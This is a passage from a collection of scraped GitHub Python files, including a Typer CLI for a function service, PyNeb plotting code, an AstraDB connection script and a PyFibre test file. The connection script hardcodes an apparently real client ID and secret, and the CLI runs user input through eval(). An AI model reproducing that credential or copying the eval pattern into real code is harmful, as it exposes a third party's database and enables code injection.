DataWalker.VALUE\n\n @property\n def next_values_number(self):\n return 0\n\n @property\n def is_exhausted(self):\n return True\n\n def __repr__(self):\n return f\"<EmptyDataWalker {self._name if self._name else 'data'}: {self._data}>\"\n\n\nclass ListTreeGenerator:\n \"\"\"Generates tree from nested lists with step up/down interface\"\"\"\n def __init__(self, root_list):\n self.data = root_list\n self._stack = [root_list]\n\n def step_down(self):\n new_node = []\n self._stack.append(new_node)\n\n def step_up(self):\n last_node = self._stack.pop()\n if last_node and self._stack:\n current_node = self._stack[-1]\n current_node.append(last_node)\n\n @property\n def current_list(self):\n return self._stack[-1]\n\n def __repr__(self):\n return f'<TreeGen data: {self.data}>'\n\n\ndef walk_data(walkers: List[DataWalker], out_list: List[list]) -> Tuple[list, List[list]]:\n \"\"\"It walks over data in given walkers in proper order\n match data between each other if necessary\n and gives output containers where to put result of handled data\"\"\"\n match_mode = DataWalker.REPEAT # todo should be determined by modes of input walkers\n result_data = [ListTreeGenerator(l) for l in out_list]\n\n # first 
step is always step down because walkers create extra wrapping list (for the algorithm simplicity)\n max_value_len = max(w.next_values_number for w in walkers)\n [w.step_down_matching(max_value_len, match_mode) for w in walkers]\n\n while any(not w.is_exhausted for w in walkers):\n if all(w.what_is_next() == DataWalker.VALUE for w in walkers):\n yield [w.pop_next_value() for w in walkers], [t.current_list for t in result_data]\n elif any(w.what_is_next() == DataWalker.END for w in walkers):\n [w.step_up() for w in walkers]\n [t.step_up() for t in result_data]\n elif any(w.what_is_next() == DataWalker.SUB_TREE for w in walkers):\n max_value_len = max(w.next_values_number for w in walkers)\n [w.step_down_matching(max_value_len, match_mode) for w in walkers]\n [t.step_down() for t in result_data]\n","repo_name":"nortikin/sverchok","sub_path":"utils/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":13837,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"40655964622","text":"from cProfile import run\nfrom typing import Optional\nimport typer\nimport json\nimport requests\nimport logging\nimport os\n\nimport sys\n_VESP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))).replace('\\\\', '/')\nsys.path.append(_VESP_PATH)\n\nfrom common.error import *\n\nlocalenv_path = _VESP_PATH + \"/core/cli/localenv\"\napp = typer.Typer()\nlocalenv = json.load(open(localenv_path, 'r'))\nfiletype_map = {\n\t'js': 'jsnative',\n\t'c': 'cnative'\n}\n\n@app.command()\ndef seturl(url: str = typer.Argument(...)):\n\tr = requests.get(url=url)\n\tif r.status_code == 200:\n\t\tlocalenv[\"VESPID_URL\"] = url\n\t\ttyper.echo(f\"Connected to {url}\")\n\t\tjson.dump(localenv, open(localenv_path, 'w'))\n\telse:\n\t\ttyper.echo(f\"{url} not found\")\n\n@app.command()\ndef isconnected():\n\tif \"VESPID_URL\" in localenv:\n\t\ttyper.echo(f\"Connected to {localenv['VESPID_URL']}\")\n\telse:\n\t\ttyper.echo(f\"not connected\")\n\n\ndef process_filename(filename):\n\tfilename, extension = filename.split('.')\n\tif extension in filetype_map:\n\t\treturn filetype_map[extension]\n\telse:\n\t\traise InvalidRuntimeError()\n\n@app.command()\ndef create(vname: str = typer.Argument(...), filename: str = typer.Argument(...)):\n\t\"\"\"\n\tCreate an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\tvcode = open(filename, 'r').read()\n\t\truntime = process_filename(filename)\n\t\tif runtime not in {'c', 'js', 'cnative', 'jsnative'}:\n\t\t\traise InvalidActionError(\"Unknown runtime: {}\".format(runtime))\n\t\tdata = {\n\t\t\t'vcode': vcode,\n\t\t\t'runtime': runtime\n\t\t}\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = requests.post(\"{}/actions/{}/create\".format(url, vname), data=json.dumps(data), headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef invoke(vname: str = typer.Argument(...), args: str = typer.Argument(...)):\n\t\"\"\"\n\tInvoke an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\tdata = json.dumps({\n\t\t\t'vargs': eval(args)\n\t\t})\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = 
requests.post(\"{}/actions/{}/invoke\".format(url, vname), data=data, headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef get(vname: str = typer.Argument(...)):\n\t\"\"\"\n\tGet an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = requests.post(\"{}/actions/{}/get\".format(url, vname), headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef list(playgroundid: str = typer.Argument(...)):\n\t\"\"\"\n\tList actions\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tdata = json.dumps({\n\t\t\t'playgroundId': playgroundid\n\t\t})\n\t\tr = requests.post(\"{}/actions/list\".format(url), headers=headers, data=data)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json())\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n\nif __name__ == \"__main__\":\n app()","repo_name":"virtines/vespid","sub_path":"core/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7057189555","text":"\"\"\"@module plotAtomicData\nModule to plot the atomic data\n\"\"\" \n\nimport pyneb as pn\nimport numpy as np\nif pn.config.INSTALLED['plt']:\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.ticker import MaxNLocator\n\nfrom pyneb.utils.misc import int_to_roman, parseAtom\n\nclass DataPlot(object):\n \"\"\"\n Plot transition probabilities and collision strengths from different data sets\n \n \"\"\"\n def __init__(self, elem=None, spec=None, all_data=[], atom=None, n_tem_points=10000, \n ref_tem=None, OmegaInterp='linear',NLevels=None):\n \"\"\"\n Parameters:\n elem: atomic elem \n spec: ionization stage in spectroscopic notation (I = 1, II = 2, etc.)\n atom: e.g. 
'O3'\n all_data: dictionary of all_data to be compared (see above for format)\n n_tem_points: number of points in the fit (default=100; increase if fit is not smooth)\n ref_tem: array of temperature values to be signaled in the plots\n OmegaInterp: interpolating function between Omega values ('Cheb' [default], 'Linear')\n \n **Example:**\n \n dataplot = pn.DataPlot('O', 3) # initializes the plot\n \n dataplot.plotA() # transition probabilities plot \n \n dataplot.plotRelA() # relative transition probabilities plot\n \n dataplot.plotOmega() # collision strength plot \n\n \n \"\"\"\n colors = np.array(['r', 'g', 'b', 'm', 'c', 'y'])\n self.calling = 'DataPlot'\n if atom is not None:\n self.atom = str.capitalize(atom)\n self.elem = parseAtom(self.atom)[0]\n self.spec = int(parseAtom(self.atom)[1])\n else:\n self.elem = str.capitalize(elem)\n self.spec = int(spec)\n self.atom = self.elem + str(self.spec)\n\n old_data = pn.atomicData.getDataFile(self.atom)\n # Check if matplotlib installed\n if not pn.config.INSTALLED['plt']:\n pn.log_.warn('Matplotlib not installed!', calling=self.calling)\n\n # Separate omega and A data sets \n atom_data = []\n coll_data = []\n if all_data == []:\n all_data = pn.atomicData.getAllAvailableFiles(self.atom, mark_current=False)\n i_colors = 0 \n for file_ in all_data:\n ID = file_.split('_')[-1]\n type_ = (file_.split('_')[2]).split('.')[0]\n if type_ in ['atom', 'coll']:\n data_list = type_ + '_data'\n vars()[data_list].append({'ID': ID, 'file_': file_, 'type': type_, 'color': colors[i_colors % len(colors)]})\n i_colors += 1\n \n self.atom_data = atom_data\n self.coll_data = coll_data\n\n # Temperature values to be signaled by vertical lines in omega plots. Can be changed by defining ref_tem\n if ref_tem is None:\n self.ref_tem = np.log10([5000., 10000., 20000.]) \n else:\n self.ref_tem = ref_tem\n\n # If it's not standard effective collision strengths, we don't want it\n coll_data_temp=[]\n for item in self.coll_data: \n coll_data_temp.append(item)\n for data in coll_data_temp:\n pn.atomicData.setDataFile(data['file_'])\n atom = pn.Atom(self.elem, self.spec, OmegaInterp=OmegaInterp, NLevels=NLevels)\n \"\"\"\n try:\n if 'O_UNIT' in atom.CollData.comments.keys():\n self.coll_data.remove(data)\n except:\n pass\n \"\"\"\n # For each data set, an atom is built. 
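One pn.Atom is created per\n            # data file so the plotting methods below can query every\n            # reference through the same interface.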
\n del(atom)\n for data in self.atom_data + self.coll_data:\n pn.atomicData.setDataFile(data['file_'])\n atom = pn.Atom(self.elem, self.spec, OmegaInterp=OmegaInterp, NLevels=NLevels)\n data['atom'] = atom\n for data in old_data:\n if data is not None:\n pn.atomicData.setDataFile(data)\n self.atom_rom = (self.elem + '_' + int_to_roman(int(self.spec))).lower()\n self.n_tem_points = n_tem_points\n\n self.atom_n_max = 0\n for at in self.atom_data:\n if at['atom'].atomFileType != 'chianti':\n if at['atom'].atomNLevels > self.atom_n_max:\n self.atom_n_max = at['atom'].atomNLevels\n self.coll_n_max = 0\n for at in self.coll_data:\n if at['atom'].collFileType != 'chianti':\n if at['atom'].collNLevels > self.coll_n_max:\n self.coll_n_max = at['atom'].collNLevels\n \n def plotA(self, save=False, figsize=(18, 12), fignum=None, NLevels=None):\n \"\"\"\n Plot the log of the A values of each data set \n \n **Parameters:**\n save: if True, saves the plot in a file\n figsize: figure size (default: [18, 12])\n fignum: figure Number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n plt.figure(fignum, figsize=figsize)\n plt.clf()\n ax = plt.subplot(111)\n x = np.arange(atom_n_max * (atom_n_max - 1) / 2.)\n ticks = x\n # Inventory of markers. Chosen to be distinguished even when overlapped\n mark = ['<', (5, 1), '>', 'o', '|']\n i_marker = 0\n # Background colors to distinguish lower levels \n bg_color = 'grbymc' \n tick_label = []\n \n for i in range(atom_n_max - 1):\n # x0, x1 are start and end points of each level\n x0 = i * (atom_n_max - 1) - i * (i - 1) / 2 - 0.5\n width = atom_n_max - i - 1\n x1 = x0 + width\n plt.axvspan(x0, x1, facecolor=bg_color[i%6], alpha=0.05)\n # The x axis must stretch the maximum range (although some data set might have a lower n_level)\n for j in range(i + 1, atom_n_max):\n tick_label.append('(' + str(j + 1) + ', ' + str(i + 1) + ')')\n\n\n for data in self.atom_data:\n n_levels = data['atom'].atomNLevels\n Ay = []\n A = data['atom'].getA()\n color = data['color']\n try:\n for i in range(n_levels - 1):\n for j in range(i + 1, n_levels):\n if A[j, i] > 0:\n Ay.append(np.log10(A[j, i]))\n else:\n Ay.append(np.NaN)\n plt.scatter(x, Ay, marker=mark[i_marker], s=300., c=color, alpha=0.35, linewidths=1, label='%s' % (data['ID']))\n ax.set_xticks(ticks)\n except:\n pn.log_.warn('Problem in plotting A', calling=self.calling + '.plotA')\n i_marker += 1\n ax.set_xticklabels(tick_label)\n\n # Plot features\n plt.xlabel('Transition')\n plt.ylabel('Log A(j, i)')\n plt.title('Transition probabilities for [%s %s]' % (self.elem, int_to_roman(int(self.spec))))\n plt.legend(loc='lower right', markerscale=1., scatterpoints=1, borderpad=1, labelspacing=1)\n plt.show() \n if save:\n plt.figure(figsize=[18, 12])\n plt.savefig(self.atom_rom + '_' + data['ID'] + \"-\" + self.ref_data + \"_A.pdf\")\n\n\n\n def plotAllA(self, save=False, figsize=(18, 12), fignum=None, NLevels=None):\n \"\"\"\n Plot the log of the A values of each data set \n \n Parameters:\n save: if True, saves the plot in a file\n figsize: figure size (default: [18, 12])\n fignum: figure Number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n fig = plt.figure(fignum, figsize=figsize)\n plt.clf()\n max_y_ticks = 6\n ticks = 
np.arange(len(self.atom_data)+1)[1:] \n \n A = np.zeros([len(self.atom_data), atom_n_max, atom_n_max])\n color=[]\n for i, data in enumerate(self.atom_data):\n A_tmp = data['atom'].getA()\n if A_tmp.shape[0] > atom_n_max:\n A[i, :] = A_tmp[0:atom_n_max, 0:atom_n_max]\n else:\n A[i, 0:A_tmp.shape[0], 0:A_tmp.shape[1]] = A_tmp\n color.append(data['color'])\n \n A[np.where((A<=0))] = np.NaN\n lgA = np.log10(A)\n \n x = ticks\n color = np.array(color)\n for j in range(2, atom_n_max+1):\n for i in range(1, j):\n y = lgA[:, j-1, i-1]\n ax = plt.subplot(atom_n_max - 1, atom_n_max - 1, (atom_n_max-1)*(j-2) + i)\n ax.set_xticks(x)\n plt.xlim((min(x)-0.5, max(x)+0.5))\n ax.yaxis.set_major_locator(MaxNLocator(max_y_ticks-1))\n try:\n plt.scatter(x, y, c=color, label='_nolegend_', s=40, edgecolor='None')\n lbl = '({0} -> {1})'.format(j,i)\n ax.text(0.95, 0.95, lbl, fontsize=10, color=\"#660066\", transform=ax.transAxes, ha=\"right\", va=\"top\") \n except:\n pn.log_.warn('Problem with plotting a subplot {} {}'.format(i,j), calling=self.calling)\n if (j==atom_n_max) & (i==1): \n plt.xlabel('Reference #', fontsize=8)\n plt.ylabel('Log(A$_{ji}$)', fontsize=8)\n plt.subplots_adjust(left=0.15, right=0.95, top=0.95, bottom=0.12)\n plt.gca().get_yaxis().get_major_formatter().set_useOffset(False)\n ax.set_xticks(x)\n \n #fig.text(.5, .05, \"i (lower level)\", fontsize=12, ha='center', color=\"#660066\", va='top')\n #fig.text(.05, .5, \"j (upper level)\", ha='left', va='center', fontsize=12, color=\"#660066\", rotation=90)\n title = \"Available transition probabilities for {0} {1}\".format(self.elem, int_to_roman(int(self.spec)))\n fig.text(.5, .95, title, color=\"#191970\", fontsize=14, ha='center')\n for i, data in enumerate(self.atom_data):\n x_txt = .95\n y_txt = .85 - .04*i \n fig.text(x_txt, y_txt, \"Ref. %d: %s\" %(i+1, data['ID']), color=color[i], ha = 'right') \n\n plt.tight_layout(pad=0.1)\n if save:\n plt.savefig(self.atom_rom + \"_all_As.pdf\")\n \n plt.show() \n \n\n def plotRelA(self, ref_data=None, save=False, figsize=None, fignum=None, NLevels=None, fig=None):\n \"\"\"\n Plot the relative difference of the A of each data set with respect to the reference one\n\n Parameters:\n ref_data: reference data set for comparing transition probabilities (default=first data ID)\n save: if True, save the plot in a file (default: False)\n figsize: figure size (default: [18, 12])\n fignum: figure number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n # Commented out because it produced an extra, empty frame - VL 30 Jul 2015\n #if fig is None:\n # fig = plt.figure(fignum, figsize=figsize)\n #plt.clf()\n ticks = range(atom_n_max + 1)[1:]\n\n # The As of the reference data set are stored\n if ref_data is None:\n ref_data = self.atom_data[0]['ID']\n for data in self.atom_data:\n if (data['ID'] == ref_data):\n ref_A = data['atom'].getA()\n # Only non-zero values are taken into account to prevent dividing by zero\n nonzero_ref_A_indexes = np.nonzero(ref_A)\n\n for data in self.atom_data:\n if (data['ID'] != ref_data):\n A = data['atom'].getA()\n try:\n # The data to be compared might have fewer levels than the reference one. 
Only the ones in common are considered.\n tmp_indexes = np.asarray(nonzero_ref_A_indexes) \n up_indexes = tmp_indexes[0][tmp_indexes[0] < data['atom'].atomNLevels]\n lo_indexes = tmp_indexes[1][tmp_indexes[0] < data['atom'].atomNLevels]\n # Indexes for which the reference data set is not zero\n ref_indexes = (up_indexes, lo_indexes)\n # Ratio of A/A_ref for non-zero A_ref values\n A_ratio = A[ref_indexes] / ref_A[ref_indexes]\n nonzero_A_ratio_indexes = np.nonzero(A_ratio)\n rel_A = np.log10(A_ratio[nonzero_A_ratio_indexes])\n # Plotting starts\n #fig = plt.figure()\n if fig is None:\n fig = plt.figure(fignum, figsize=figsize)\n plt.clf()\n ax = plt.subplot(111)\n fig.subplots_adjust(top=0.9)\n # Physical levels = array levels + 1\n x = np.asarray(lo_indexes) + 1\n y = np.asarray(up_indexes) + 1\n # Size is proportional to difference between As\n # Numerical value of size adjusted empirically, no particular meaning \n size = np.multiply(10000., np.abs(rel_A))\n # A different color is assigned to data points depending on whether they are smaller or larger\n # than the reference data.\n # The ratio is not compared to exactly one to include only truly different values \n index_grt = np.where(rel_A > 0.0000)\n color_grt = np.array(['#FF8C00']).repeat(x[index_grt].size)\n index_sml = np.where(rel_A <= 0.0)\n color_sml = np.array(['#FF1480']).repeat(x[index_sml].size)\n # The range is adjusted to include only values for which there is a difference\n xmin = np.max([np.min(x[index_sml]), np.min(x[index_grt])])\n xmax = np.min([np.max(x[index_sml]), np.max(x[index_grt])])\n ax.set_xticks(ticks)\n ax.set_xlim((xmin - 0.25, xmax + 0.25)[:])\n # The x-axis is plotted on the top to mimic the data array in the fits file\n for tick in ax.xaxis.get_major_ticks():\n tick.label1On = False\n tick.label2On = True\n ymin = np.min([np.min(y[index_sml]), np.min(y[index_grt])])\n ymax = np.max([np.max(y[index_sml]), np.max(y[index_grt])])\n ax.set_yticks(ticks)\n # The y axis increases downward to mimic the data array in the fits file\n ax.set_ylim((ymin - 0.25, ymax + 0.25)[::-1])\n # Fake points, just to generate the labels (I don't know how to generate a reasonable label\n # for data points with markers of different size)\n plt.scatter(x[index_grt][0], y[index_grt][0], marker='o', s=.0002, c=color_grt[0],\n label='Positive (max = %.2f)' % (np.max(rel_A)))\n plt.scatter(x[index_grt][0], y[index_grt][0], marker='o', s=.0002, c=color_sml[0],\n label='Negative (min = %.2f)' % (np.min(rel_A)))\n # True data; size reflects divergence from reference data, color whether positive or negative\n plt.scatter(x[index_grt], y[index_grt], marker='o', s=size[index_grt], c=np.asarray(color_grt), alpha=1.0)\n plt.scatter(x[index_sml], y[index_sml], marker='o', s=size[index_sml], c=np.asarray(color_sml), alpha=1.0)\n # X-axis label \n ax.text(.5, 1.05, '$i$ (lower level)', transform=ax.transAxes, ha='center', va='bottom')\n #plt.xlabel('$i$ (lower level)')\n # Y-axis label\n plt.ylabel('$j$ (upper level)')\n # Legend\n plt.legend(loc='upper right', markerscale=1000., scatterpoints=1, borderpad=1,\n labelspacing=1, prop=dict(size=12), title=u'Log (%s / %s)' % (data['ID'], ref_data))\n # Plot title\n ax.text(.5, -.10, \"Relative difference between $A$s data for [%s %s]\" \n % (self.elem, int_to_roman(int(self.spec))),\n transform=ax.transAxes, ha='center', va='bottom', color='#191970', size=12)\n except:\n pn.log_.warn('Problem in plotting relA', calling='DatasetPlot')\n\n if save:\n plt.savefig(self.atom_rom + '_' + data['ID'] + 
\"-\" + ref_data + \"_relA.pdf\")\n \n plt.show() \n\n\n def plotOmega(self, save=False, figsize=(18, 12), fignum=1, scan_orders=None, NLevels=None,\n fig=None):\n \"\"\"\n Plot the tabulated collision strengths of each data set and the fit that is performed by PyNeb\n \n Parameters:\n save: Boolean. Determine if the plot is automatically saved in a file (default: False)\n figsize: List. figure size in inches (default: [18, 12])\n fignum: Figure Number DEPRECATED!!!\n scan_orders: = None or (min_order, max_order) or (min_order, -1) to go until the max. DEPRECATED!!!\n fig: DEPRECATED!!!\n \"\"\"\n if NLevels is None:\n coll_n_max = self.coll_n_max\n else:\n coll_n_max = NLevels\n # Plotting range somewhat larger than actual data range (less tight) \n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n if fig is None:\n #fig = plt.figure(fignum, figsize=figsize)\n fig, axes = plt.subplots(coll_n_max-1, coll_n_max-1, figsize=figsize)\n plt.autoscale(tight=False)\n # I need two \n first = True\n first_done = False\n \n legend_text = []\n legend_lines = []\n \n axes_plotaxis = np.zeros_like(axes, dtype=bool) \n# style_dic = ['-', '--', '-.', ':'] * 10\n for data in self.coll_data:\n # tem_points = tabulated temperature points (different for each data set)\n tem_points = self.tem_in_K(data['atom'].tem_units, data['atom'].getTemArray())\n tem_min = min(tem_points)\n tem_max = max(tem_points)\n # tem_funct = array of temperature values for which the fit is evaluated\n tem_funct = np.linspace(tem_min, tem_max, self.n_tem_points)\n x_dots = np.log10(tem_points)\n x_lines = np.log10(tem_funct)\n if 'COEFF' in data['atom'].CollData.comments.keys():\n coeff = float(data['atom'].CollData.comments['COEFF'])\n else:\n coeff = 1.0\n # Loops over all levels\n for i in range(1, coll_n_max+1):\n for j in range(i + 1, coll_n_max+1): \n # N levels require an N-1 x N-1 array of plots\n # The subplots are arranged in rows and columns according to the upper and lower levels\n ax = axes[j-2, i-1]\n axes_plotaxis[j-2, i-1] = True\n if (i <= data['atom'].collNLevels) and (j <= data['atom'].collNLevels):\n y_dots = data['atom'].getOmega(tem_points, j, i)\n try:\n if 'O_UNIT' not in data['atom'].CollData.comments:\n y_dots = coeff * data['atom'].getOmegaArray(j, i)\n if y_dots.sum() > 0.0:\n ax.plot(x_dots, y_dots, color=data['color'],\n marker='*', linestyle='None', label='_nolegend_', markersize=10)\n \n y_dots = data['atom'].getOmega(tem_points, j, i)\n if y_dots.sum() > 0.0:\n ax.plot(x_dots, y_dots, color=data['color'],\n marker='o', linestyle='None', label='_nolegend_')\n y_lines = data['atom'].getOmega(tem_funct, j, i)\n if y_lines.sum() > 0.:\n ax.plot(x_lines, y_lines,\n color=data['color'], label='_nolegend_')\n except:\n pn.log_.warn('Problem with plotting a data set', calling=self.calling)\n# Draws vertical lines at selected temperature values (only once for each subplot, hence \"first\") \n if (first and (data['atom'].collNLevels == coll_n_max)):\n for tem in self.ref_tem:\n ax.axvline(tem, c='blue', alpha=0.4, ls=':')\n lbl = \"$\\Omega$\" + \"(\" + str(j) + \",\" + str(i) + \")\"\n ax.text(0.95, 0.95, lbl, transform=ax.transAxes, ha=\"right\", va=\"top\") \n first_done = True \n # Maximum number of ticks to avoid overcrowding\n ax.xaxis.set_major_locator(MaxNLocator(4))\n ax.yaxis.set_major_locator(MaxNLocator(3))\n # The line type and identifier of each data set are stored for the legend\n legend_lines.append(mpl.lines.Line2D(tem_funct, tem_funct, 
color=data['color'], linestyle='-'))\n legend_text.append(data['ID'])\n if first_done:\n first = False\n # The labels of the reference temperature values are only plotted above the last plot\n for tem in self.ref_tem:\n ax.text(tem, ax.get_ylim()[1], ' %0.0f K' % (10 ** tem), ha=\"left\", va=\"bottom\", \n rotation=65, fontsize=12, color='#FF0000', alpha=0.35)\n # Axis labels, title and legend \n fig.text(.5, .05, \"Log($T_e/K$)\", fontsize=16, ha='center', va='top')\n fig.text(.05, .5, \"$\\Omega$\", va='center', fontsize=20, rotation=90)\n fig.text(.5, .95, \"[%s %s] collision strengths\" % (self.elem, int_to_roman(int(self.spec))), \n color=\"#191970\", fontsize=16, ha='center')\n# plt.legend(legend_lines, legend_text, loc='upper right', borderpad=1, \n# labelspacing=1, bbox_to_anchor=(1, 1 * coll_n_max))\n axes[0, coll_n_max-2].legend(legend_lines, legend_text, loc='upper right', borderpad=1, \n labelspacing=1)\n for ax, ax_plt in zip(axes.ravel(), axes_plotaxis.ravel()):\n if not ax_plt:\n ax.set_axis_off()\n #plt.tight_layout()\n if save:\n fig.savefig(self.atom_rom + \"_CS.pdf\")\n \n fig.show()\n\n\n def tem_in_K(self, tem_units, tem):\n \"\"\"\n Convert the temperature from the unit of the fits file into K\n\n Parameters:\n tem_units: 'log(K)' or 'K/10000'\n tem: temperature\n \"\"\"\n \n if (tem_units == \"log(K)\"):\n return np.power(10., tem)\n elif (tem_units == \"K/10000\"):\n return np.multiply(tem, 1.e4)\n else: #T in Kelvin in the fits file\n return tem\n \n \n","repo_name":"Morisset/PyNeb_devel","sub_path":"pyneb/plot/plotAtomicData.py","file_name":"plotAtomicData.py","file_ext":"py","file_size_in_byte":23861,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"17763104291","text":"from cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\nimport pathlib\n#from . 
import config\n\nBASE_DIR = pathlib.Path(__file__).resolve().parent\n\n#settings = config.get_settings()\nASTRADB_CONNECT_BUNDLE = BASE_DIR / \"connect_bundle\" / \"secure-connect-video-based-learning-platform-2.zip\"\n\nASTRADB_CLIENT_ID= \"cIsXkYgvPldmsWiEYaATRwhU\"\nASTRADB_CLIENT_SECRET = \"KTmZBMNUvax8.EmeQiNNWQehiHLRB8OzGgWog+a+imt7DZrOk1bd+3Dzr2t9AA0-E+Fv5q4D5E8i545tPSxe_CEtAiJDs53FwZsedxubtxyrL8fXPKXyeyrqOafdXWZf\"\n\ncloud_config= {\n 'secure_connect_bundle': ASTRADB_CONNECT_BUNDLE\n}\nauth_provider = PlainTextAuthProvider(ASTRADB_CLIENT_ID, ASTRADB_CLIENT_SECRET)\ncluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)\nsession = cluster.connect()\n\nrow = session.execute(\"select release_version from system.local\").one()\nif row:\n print(row[0])\nelse:\n print(\"An error occurred.\")","repo_name":"AbelBekele/Video-based-learning-platform","sub_path":"app/connect_database.py","file_name":"connect_database.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"10045865511","text":"import os\nfrom tempfile import TemporaryDirectory\n\nfrom pandas import DataFrame, Series\n\nfrom pyfibre.pyfibre_runner import PyFibreRunner\nfrom pyfibre.model.objects.segments import (\n FibreSegment, CellSegment\n)\nfrom pyfibre.tests.pyfibre_test_case import PyFibreTestCase\nfrom pyfibre.tests.probe_classes.objects import (\n ProbeFibreNetwork, generate_probe_segment)\nfrom pyfibre.tests.probe_classes.utilities import (\n generate_image, generate_probe_graph)\n\nfrom ..shg_analyser import SHGAnalyser\n\nfrom .probe_classes import ProbeSHGImage\n\n\nclass TestSHGAnalyser(PyFibreTestCase):\n\n def setUp(self):\n self.image, _, _, _ = generate_image()\n self.network = generate_probe_graph()\n self.fibre_networks = [ProbeFibreNetwork()]\n self.fibre_segments = [generate_probe_segment(FibreSegment)]\n self.cell_segments = [generate_probe_segment(CellSegment)]\n\n self.multi_image = ProbeSHGImage()\n self.analyser = SHGAnalyser(\n multi_image=self.multi_image\n )\n self.runner = PyFibreRunner()\n\n def test_file_paths(self):\n\n directory = os.path.join('path', 'to', 'image')\n\n self.multi_image.path = directory\n self.assertEqual(\n os.path.join(directory, 'test-shg-pyfibre-analysis', 'data'),\n self.analyser.data_path)\n self.assertEqual(\n os.path.join(directory, 'test-shg-pyfibre-analysis', 'fig'),\n self.analyser.fig_path)\n self.assertEqual(\n os.path.join(\n directory, 'test-shg-pyfibre-analysis', 'data', 'test-shg'),\n self.analyser._data_file)\n self.assertEqual(\n os.path.join(\n directory, 'test-shg-pyfibre-analysis', 'fig', 'test-shg'),\n self.analyser._fig_file)\n\n def test_get_ow_options(self):\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n\n ow_network, ow_segment, ow_metric = (\n self.analyser.get_analysis_options(self.runner)\n )\n\n self.assertTrue(ow_network)\n self.assertTrue(ow_segment)\n self.assertTrue(ow_metric)\n\n def test_make_directories(self):\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\"\n )\n )\n )\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"fig\"\n )\n )\n )\n\n def test_save_load_networks(self):\n 
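# round-trip check: save the network and fibre networks to disk, reload them, and compare the graphs\n 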
self.analyser._network = self.network\n self.analyser._fibre_networks = self.fibre_networks\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_networks()\n\n networks = ['test-shg_fibre_networks.json',\n 'test-shg_network.pkl']\n\n for network in networks:\n self.assertIn(\n network,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_networks()\n\n self.assertListEqual(\n list(self.network.nodes),\n list(self.analyser._network.nodes))\n self.assertListEqual(\n list(self.network.edges),\n list(self.analyser._network.edges))\n\n self.assertEqual(1, len(self.analyser._fibre_networks))\n self.assertListEqual(\n list(self.fibre_networks[0].graph.nodes),\n list(self.analyser._fibre_networks[0].graph.nodes))\n self.assertListEqual(\n list(self.fibre_networks[0].graph.edges),\n list(self.analyser._fibre_networks[0].graph.edges))\n\n def 